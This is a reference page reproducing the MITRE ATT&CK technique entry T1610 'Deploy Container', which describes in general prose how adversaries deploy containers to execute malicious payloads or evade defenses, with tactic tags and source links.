T1610Techniquedefense-evasionexecutionagent-callable

T1610Deploy Container

Platforms: Containers

ATT&CK version: 14.1

What it is

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. Containers can be deployed by various means, such as via Docker's <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)

ATT&CK tactics· 2

Defense EvasionExecution

References

  1. https://attack.mitre.org/techniques/T1610
  2. https://blog.aquasec.com/malicious-container-image-docker-container-host
  3. https://docs.docker.com/engine/api/v1.41/#tag/Container
  4. https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/
  5. https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/
Sourced from MITRE ATT&CK Enterprise v14.1. Curated and contextualized for EU compliance use cases by Adam Lundqvist, Founder at SQUR.